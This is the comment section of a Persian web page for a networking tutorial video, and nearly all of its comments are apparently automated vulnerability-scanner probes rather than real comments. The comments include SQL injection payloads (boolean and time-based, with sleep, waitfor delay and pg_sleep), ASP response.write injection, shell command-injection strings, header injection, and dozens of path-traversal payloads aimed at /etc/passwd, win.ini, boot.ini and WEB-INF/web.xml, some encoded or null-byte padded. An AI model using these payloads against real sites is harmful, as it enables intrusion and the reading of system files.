با حمایت ما%۵
تخفیف بگیرد

logo-samandehi

آموزش شبکه 16-Diagramming

ارسال نظر

ribdvvix در تاریخ: ۷ فروردین ۱۳۹۵ _ ۱۵:۴۶:۲۲نوشت:

1

smvnnlaf در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۴:۳۶:۵۴نوشت:

1

bwahtejg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۴:۴۱:۳۵نوشت:

1

svuyepce در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۴:۴۴:۰۵نوشت:

1

gvyrrdkr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۲۹نوشت:

response.write(9894748*9255417)

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1

gvyrrdkr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۰نوشت:

'+response.write(9894748*9255417)+'

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1

gvyrrdkr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۱نوشت:

"+response.write(9894748*9255417)+"

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۱نوشت:

-1 OR 2+289-289-1=0+0+0+1 --

gvyrrdkr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۱نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۱نوشت:

-1 OR 3+289-289-1=0+0+0+1 --

gvyrrdkr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۱نوشت:

1

gvyrrdkr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۲نوشت:

1

response.write(9854639*9840511) در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۳نوشت:

1

'+response.write(9854639*9840511)+' در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۳نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۳نوشت:

-1 OR 3*2<(0+5+289-289) --

"+response.write(9854639*9840511)+" در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۳نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۴نوشت:

-1 OR 3*2>(0+5+289-289) --

dyddsmjx در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۴نوشت:

set|set&set

dyddsmjx در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۴نوشت:

'set|set&set'

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۴نوشت:

-1 OR 2+759-759-1=0+0+0+1

dyddsmjx در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۴نوشت:

"set|set&set"

dyddsmjx در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۵نوشت:

set|set&set

dyddsmjx در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۶نوشت:

`set|set&set`

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۶نوشت:

-1 OR 3+759-759-1=0+0+0+1

dyddsmjx در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۶نوشت:

;set|set&set;

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۷نوشت:

-1 OR 3*2<(0+5+759-759)

dyddsmjx در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۷نوشت:

1

dyddsmjx در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۸نوشت:

1

dyddsmjx در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۳۹نوشت:

1

dyddsmjx در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۰نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۰نوشت:

-1 OR 3*2>(0+5+759-759)

dyddsmjx در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۰نوشت:

1

dyddsmjx در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۱نوشت:

1

set|set&set در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۱نوشت:

1

'set|set&set' در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۲نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۲نوشت:

-1' OR 2+521-521-1=0+0+0+1 --

"set|set&set" در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۲نوشت:

1

set|set&set در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۲نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۳نوشت:

-1' OR 3+521-521-1=0+0+0+1 --

`set|set&set` در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۳نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۴نوشت:

-1' OR 3*2<(0+5+521-521) --

;set|set&set; در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۴نوشت:

1

hedjsxou در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۴نوشت:

SomeCustomInjectedHeader:injected_by_wvs

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۴نوشت:

-1' OR 3*2>(0+5+521-521) --

hedjsxou در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۵نوشت:

SomeCustomInjectedHeader:injected_by_wvs

hedjsxou در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۵نوشت:

SomeCustomInjectedHeader:injected_by_wvs

hedjsxou در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۵نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۶نوشت:

-1" OR 2+211-211-1=0+0+0+1 --

hedjsxou در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۶نوشت:

1

hedjsxou در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۶نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۷نوشت:

-1" OR 3+211-211-1=0+0+0+1 --

SomeCustomInjectedHeader:injected_by_wvs در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۸نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۸نوشت:

-1" OR 3*2<(0+5+211-211) --

SomeCustomInjectedHeader:injected_by_wvs در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۸نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۸نوشت:

-1" OR 3*2>(0+5+211-211) --

SomeCustomInjectedHeader:injected_by_wvs در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۸نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۹نوشت:

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۹نوشت:

../../../../../../../../../../etc/passwd

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۴۹نوشت:

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۰نوشت:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۰نوشت:

1 waitfor delay '0:0:6' --

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۰نوشت:

../../../../../../../../../../etc/passwd\0.jpg

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۰نوشت:

CzUYm8Fy'; waitfor delay '0:0:6' --

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۱نوشت:

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۱نوشت:

fwcTILQB'); waitfor delay '0:0:6' --

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۱نوشت:

F4QByItZ')); waitfor delay '0:0:6' --

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۱نوشت:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۱نوشت:

qtGzzXah';select pg_sleep(6); --

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۲نوشت:

/../..//../..//../..//../..//../..//etc/passwd\0.jpg

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۲نوشت:

6zYorMNf');select pg_sleep(6); --

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۲نوشت:

1hbhtWml'));select pg_sleep(9); --

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۳نوشت:

.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۳نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۳نوشت:

/etc/passwd

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۴نوشت:

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۴نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۴نوشت:

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۴نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۵نوشت:

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۵نوشت:

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۵نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۶نوشت:

file:///etc/passwd

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۶نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۶نوشت:

/\\../\\../\\../\\../\\../\\../\\../etc/passwd

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۷نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۷نوشت:

WEB-INF/web.xml

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۸نوشت:

WEB-INF\\web.xml

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۸نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۴:۵۹نوشت:

../../../../../../../../../../windows/win.ini

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۰نوشت:

../../../../../../../../../../boot.ini

bklymfbl در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۱نوشت:

TicketBtn=ثبت نظر

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۱نوشت:

../../../../../../../../../../windows/win.ini\0.jpg

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۲نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۲نوشت:

bklymfbl در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۳نوشت:

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۳نوشت:

................windowswin.ini

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۳نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۴نوشت:

..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini

bklymfbl در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۴نوشت:

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۴نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۴نوشت:

/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini

bklymfbl در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۵نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۶نوشت:

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۶نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۶نوشت:

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

bklymfbl در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۷نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۷نوشت:

unexisting/../../../../../../../../../../windows/win.ini.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\